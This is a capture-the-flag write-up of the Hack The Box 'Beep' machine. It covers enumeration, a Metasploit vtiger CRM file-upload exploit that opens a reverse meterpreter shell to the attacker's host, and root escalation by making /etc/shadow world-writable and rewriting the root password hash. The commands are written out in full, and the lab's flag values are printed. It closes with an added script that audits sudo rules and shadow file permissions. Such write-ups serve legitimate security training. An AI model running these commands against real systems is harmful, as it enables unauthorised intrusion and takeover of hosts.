About

Beep runs a very large number of services, which can make it a bit challenging to find the correct entry point. This machine can be overwhelming for some, as there are many potential attack vectors. Luckily, several methods are available for gaining access.

Enumeration

Running the script portscan.sh reveals 7 attack vectors: SSH, SMTP, HTTP(S), POP3(S), RPC, IMAP(S) and MySQL.

┌──(m0nk3y@kali)-[~/HTB/Beep]
└─$ sudo portscan.sh 10.129.1.226

┌──(m0nk3y@kali)-[~/HTB/Beep]
└─$ cat PortScan\(10.129.1.226\)

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp    open  http       Apache httpd 2.2.3
|_http-title: Did not follow redirect to https://10.129.1.226/
|_http-server-header: Apache/2.2.3 (CentOS)
110/tcp   open  pop3?
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            938/udp   status
|_  100024  1            941/tcp   status
143/tcp   open  imap?
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
| http-robots.txt: 1 disallowed entry
|_/
|_ssl-date: 2023-09-06T13:36:13+00:00; -3s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Elastix - Login page
941/tcp   open  status     1 (RPC #100024)
993/tcp   open  imaps?
995/tcp   open  pop3s?
3306/tcp  open  mysql?
4190/tcp  open  sieve?
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax?
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Host: 127.0.0.1

Host script results:
|_clock-skew: -3s

PORT      STATE SERVICE VERSION
10000/udp open  webmin  (https on TCP port 10000)

Exploitation

HTTP

Running gobuster reveals a large number of directories, all of which need to be checked for potential vulnerabilities.

┌──(m0nk3y@kali)-[~/HTB/Beep]
└─$ gobuster dir -u https://10.129.1.226 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -f -k -t 32
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.129.1.226
[+] Method:                  GET
[+] Threads:                 32
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
2023/09/06 09:48:20 Starting gobuster in directory enumeration mode
===============================================================
/help/                (Status: 200) [Size: 346]
/cgi-bin/             (Status: 403) [Size: 288]
/images/              (Status: 200) [Size: 29900]
/recordings/          (Status: 200) [Size: 5194]
/panel/               (Status: 200) [Size: 1065]
/static/              (Status: 200) [Size: 1278]
/themes/              (Status: 200) [Size: 3174]
/admin/               (Status: 302) [Size: 0] [--> config.php]
/icons/               (Status: 200) [Size: 31008]
/error/               (Status: 403) [Size: 286]
/pipermail/           (Status: 200) [Size: 700]
/mail/                (Status: 200) [Size: 2411]
/modules/             (Status: 200) [Size: 13134]
/lang/                (Status: 200) [Size: 4790]
/mailman/             (Status: 403) [Size: 288]
/vtigercrm/           (Status: 200) [Size: 6499]
/libs/                (Status: 200) [Size: 7800]
/var/                 (Status: 200) [Size: 1238]
===============================================================
2023/09/06 10:29:32 Finished
===============================================================

By manually checking every page found, I’m able to map each directory to its service as follows.

URL                               Service            Version
https://10.129.1.226/             Elastix            Unknown
https://10.129.1.226/recordings/  FreePBX            2.5
https://10.129.1.226/mail/        RoundCube Webmail  Unknown
https://10.129.1.226/vtigercrm/   vtiger CRM         5.1.0

Of these services, I’ll start with vtiger CRM, since I already know its version and it is known to have a lot of vulnerabilities.

Using searchsploit-prettify.py, I’m able to find a vast number of exploits, as expected. Although the version is a little different, I’ll start by testing the exploit vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasploit), since it doesn’t require authentication and the vulnerability might have existed in version 5.1.0.

┌──(m0nk3y@kali)-[~/HTB/Beep]
└─$ searchsploit-prettify.py 'vtiger CRM 5'
 --------------------------------------------------------------------------------------------------------------------- -----------------------------------------------------
| Exploit Title                                                                                                       | Path                                                |
 --------------------------------------------------------------------------------------------------------------------- -----------------------------------------------------
| vTiger CRM 4.2 - 'calpath' Multiple Remote File Inclusions                                                          | /usr/share/exploitdb/exploits/php/webapps/2508.txt  |
| vTiger CRM 4.2 - SQL Injection                                                                                      | /usr/share/exploitdb/exploits/php/webapps/26586.txt |
| vTiger CRM 4.2 Leads Module - 'record' Cross-Site Scripting                                                         | /usr/share/exploitdb/exploits/php/webapps/26584.txt |
| vTiger CRM 4.2 RSS Aggregation Module - Feed Cross-Site Scripting                                                   | /usr/share/exploitdb/exploits/php/webapps/26585.txt |
| vTiger CRM 5.0.4 - Local File Inclusion                                                                             | /usr/share/exploitdb/exploits/php/webapps/16280.py  |
| vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities                                                    | /usr/share/exploitdb/exploits/php/webapps/32307.txt |
| vTiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting | /usr/share/exploitdb/exploits/php/webapps/9450.txt  |
| vTiger CRM 5.1.0 - Local File Inclusion                                                                             | /usr/share/exploitdb/exploits/php/webapps/18770.txt |
| vTiger CRM 5.2 - 'onlyforuser' SQL Injection                                                                        | /usr/share/exploitdb/exploits/php/webapps/36208.txt |
| vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (1)                                    | /usr/share/exploitdb/exploits/php/webapps/36203.txt |
| vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities (2)                                    | /usr/share/exploitdb/exploits/php/webapps/36255.txt |
| vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabilities                                      | /usr/share/exploitdb/exploits/php/webapps/36204.txt |
| vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion                                                        | /usr/share/exploitdb/exploits/php/webapps/35574.txt |
| vTiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting                                                         | /usr/share/exploitdb/exploits/php/webapps/35577.txt |
| vTiger CRM 5.3.0 5.4.0 - (Authenticated) Remote Code Execution (Metasploit)                                         | /usr/share/exploitdb/exploits/php/remote/29319.rb   |
| vTiger CRM 5.4.0 - 'index.php?onlyforuser' SQL Injection                                                            | /usr/share/exploitdb/exploits/php/webapps/28409.txt |
| vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasploit)                                       | /usr/share/exploitdb/exploits/php/remote/30787.rb   |
| vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities                                                                    | /usr/share/exploitdb/exploits/php/webapps/27279.txt |
| vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion                                                | /usr/share/exploitdb/exploits/php/webapps/32213.txt |
| vTiger CRM 6.3.0 - (Authenticated) Remote Code Execution                                                            | /usr/share/exploitdb/exploits/php/webapps/38345.txt |
| Vtiger CRM 7.1.0 - Remote Code Execution                                                                            | /usr/share/exploitdb/exploits/php/webapps/46065.py  |
 --------------------------------------------------------------------------------------------------------------------- -----------------------------------------------------

By executing the Metasploit module found, I’m able to gain a shell as the user asterisk.

┌──(m0nk3y@kali)-[~/HTB/Beep]
└─$ msfconsole -q -x 'use exploit/multi/http/vtiger_soap_upload; set RHOSTS 10.129.1.226; set RPORT 443; set SSL true; set TARGETURI /vtigercrm/; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
RHOSTS => 10.129.1.226
RPORT => 443
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
TARGETURI => /vtigercrm/
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Uploading payload...
[+] Upload successfully uploaded
[*] Executing payload...
[*] Sending stage (39927 bytes) to 10.129.1.226
[+] Deleted uzVAsrYyFZD.php
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.1.226:58482) at 2023-09-06 10:06:47 -0400

meterpreter > getuid
Server username: asterisk

Privilege Escalation

Checking for sudo rights for the user asterisk shows that I’m able to run chmod as root without a password.

sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

Using this privilege, I’ll make /etc/shadow world-writable and update the password for the user root to pwn.

sudo chmod 777 /etc/shadow

ex "+set nobackup nowritebackup" "+%s/^root:[^:]\+:/root:$(openssl passwd -salt root -1 pwn):/" -scwq /etc/shadow

Finally, by spawning a TTY shell and switching to the super user with the updated password, I’m able to gain a shell as the user root.

python -c 'import pty; pty.spawn("/bin/bash");'
bash-3.2$ su
su
Password: pwn

[root@beep vtigercrm]# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
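The root cause of this escalation is a sudoers rule that lets a service account run chmod (and chown) as root with no password, which puts /etc/shadow within reach. The following audit script is an added example, not part of the original writeup: it parses `sudo -l` output (a constructed sample copied from the listing above), flags NOPASSWD root rules for permission-changing binaries, and checks whether a shadow file's mode is still restrictive. The set of flagged binaries is an assumption limited to the two used in this technique.

```python
import re
import stat

# Constructed sample: an excerpt of the `sudo -l` output shown in the writeup.
SUDO_L_OUTPUT = """\
User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
"""

# Assumption: binaries that rewrite the mode or owner of arbitrary files,
# which is exactly what turned a NOPASSWD rule into a root shell above.
PERMISSION_BINARIES = {"/bin/chmod", "/bin/chown"}

# One rule line: "(runas) [TAG: ...] /path/to/command"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S+)")


def parse_sudo_l(text):
    """Return (runas, nopasswd, command) tuples from `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header, Defaults and continuation lines are skipped
        nopasswd = "NOPASSWD" in m.group("tags")
        rules.append((m.group("runas").strip(), nopasswd, m.group("cmd")))
    return rules


def risky_rules(text):
    """Rules that run a permission-changing binary as root without a password."""
    return [r for r in parse_sudo_l(text)
            if r[0] == "root" and r[1] and r[2] in PERMISSION_BINARIES]


def shadow_mode_ok(st_mode):
    """True if a stat() st_mode for /etc/shadow grants nothing to 'other' and
    at most read to the group (0000, 0400 and 0640 pass; 0777 fails)."""
    return stat.S_IMODE(st_mode) & 0o077 in (0, 0o040)


if __name__ == "__main__":
    for runas, _, cmd in risky_rules(SUDO_L_OUTPUT):
        print(f"risky: {cmd} runs as {runas} with NOPASSWD")
    print("shadow 0777 ok?", shadow_mode_ok(0o100777))
```

On a live host the same check would be fed the real `sudo -l` output and `os.stat("/etc/shadow").st_mode`; the script itself needs no privileges to parse the sample.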

Post Exploitation

With the shell acquired, I’m able to read the flags user.txt and root.txt.

[root@beep vtigercrm]# cat /home/fanis/user.txt
cat /home/fanis/user.txt
31d5a8d52081dcf854e96e26fb05fb56

[root@beep vtigercrm]# cat /root/root.txt
cat /root/root.txt
b7784f01167430f75e873a3082cc5831